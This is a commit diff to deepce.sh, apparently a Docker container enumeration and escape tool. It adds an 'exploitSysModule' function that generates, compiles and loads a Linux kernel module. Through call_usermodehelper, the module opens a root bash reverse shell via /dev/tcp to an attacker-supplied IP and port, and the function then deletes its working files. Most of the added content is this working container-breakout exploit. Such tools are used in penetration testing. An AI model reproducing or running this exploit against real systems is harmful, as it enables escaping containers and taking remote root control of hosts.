Project Update
This commit is contained in:
112
deepce.sh
112
deepce.sh
@@ -67,6 +67,7 @@ Usage: ${0##*/} [OPTIONS...]
|
||||
SOCK use an exposed docker sock to create a new container and mount root partition to priv esc
|
||||
CVE-2019-5746
|
||||
CVE-2019-5021
|
||||
SYS_MODULE Exploit the SYS_MODULE privilege to create a malicious kernel module and obtain root on the host
|
||||
|
||||
${DG}[Payloads & Options]$NC
|
||||
-i, --ip The local host IP address for reverse shells to connect to
|
||||
@@ -125,6 +126,8 @@ TIP_CVE_2019_5021="Alpine linux version 3.3.x-3.5.x accidentally allow users to
|
||||
TIP_CVE_2019_13139="Docker versions before 18.09.4 are vulnerable to a command execution vulnerability when parsing URLs"
|
||||
TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container escape by overwriting the runC binary"
|
||||
|
||||
TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
|
||||
|
||||
DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
|
||||
DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
|
||||
|
||||
@@ -1112,6 +1115,112 @@ exploitDockerSock() {
|
||||
# TODO: Tidy up command
|
||||
}
|
||||
|
||||
exploitSysModule(){
|
||||
printSection "Exploiting SYS_MODULE"
|
||||
printTip "$TIP_SYS_MODULE"
|
||||
|
||||
if ! [ -x "$(command -v capsh)" ]; then
|
||||
printError "capsh is required to run this exploit."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! [ -x "$(command -v make)" ]; then
|
||||
printError "make is required to run this exploit."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! [ -x "$(command -v insmod)" ]; then
|
||||
printError "insmod is required to run this exploit."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! [ -d "/lib/modules/$(uname -r)" ]; then
|
||||
printError "Linux headers for $(uname -r) are required to run this exploit."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
caps=$(capsh --print)
|
||||
if ! echo "$caps" | grep -qa "cap_sys_module" ; then
|
||||
printError "We don't have the SYS_MODULE capability, which is required for this exploit"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [ -z "$ip" ]; then
|
||||
printError "Missing reverse shell IP : use --ip"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [ -z "$port" ]; then
|
||||
printError "Missing reverse shell port : use --port"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
module_name=$(tr -dc A-Za-z </dev/urandom | head -c 13)
|
||||
sys_cwd=$(pwd)
|
||||
|
||||
mkdir /dev/shm/rev && cd /dev/shm/rev || exit 1
|
||||
|
||||
printQuestion "Writing scripts..."
|
||||
|
||||
# POC modified from https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
|
||||
cat << EOF > "$module_name.c"
|
||||
#include <linux/kmod.h>
|
||||
#include <linux/module.h>
|
||||
MODULE_LICENSE("GPL");
|
||||
MODULE_AUTHOR("AttackDefense");
|
||||
MODULE_DESCRIPTION("LKM reverse shell module");
|
||||
MODULE_VERSION("1.0");
|
||||
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/$ip/$port 0>&1", NULL};
|
||||
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
|
||||
static int __init ${module_name}_init(void) {
|
||||
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
|
||||
}
|
||||
static void __exit ${module_name}_exit(void) {
|
||||
}
|
||||
module_init(${module_name}_init);
|
||||
module_exit(${module_name}_exit);
|
||||
EOF
|
||||
|
||||
cat << EOF > Makefile
|
||||
obj-m +=${module_name}.o
|
||||
all:
|
||||
make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
|
||||
clean:
|
||||
make -C /lib/modules/$(uname -r)/build M=$(pwd) clean
|
||||
EOF
|
||||
|
||||
printSuccess "Done"
|
||||
|
||||
printQuestion "Compiling kernel module..."
|
||||
|
||||
if make 1>/dev/null ; then
|
||||
printSuccess "Done"
|
||||
else
|
||||
printError "Failed to make. Do you have all the required libraries installed?"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
printQuestion "Mounting kernel module..."
|
||||
|
||||
if insmod "$module_name.ko" 1>/dev/null ; then
|
||||
printSuccess "Done"
|
||||
else
|
||||
printError "Failed to mount module"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
printQuestion "Cleaning up..."
|
||||
|
||||
rm -r /dev/shm/rev
|
||||
|
||||
cd "$sys_cwd" || exit
|
||||
|
||||
printSuccess "Done"
|
||||
|
||||
printSuccess "Check your reverse shell handler!"
|
||||
|
||||
}
|
||||
|
||||
###########################################
|
||||
#--------------) Arg Parse (--------------#
|
||||
###########################################
|
||||
@@ -1246,6 +1355,9 @@ if [ "$exploit" ]; then
|
||||
sock | SOCK)
|
||||
exploitDockerSock
|
||||
;;
|
||||
sys | SYS | sys_module | SYS_MODULE)
|
||||
exploitSysModule
|
||||
;;
|
||||
*)
|
||||
echo "Unknown exploit $1"
|
||||
exit 1
|
||||
|
||||
Reference in New Issue
Block a user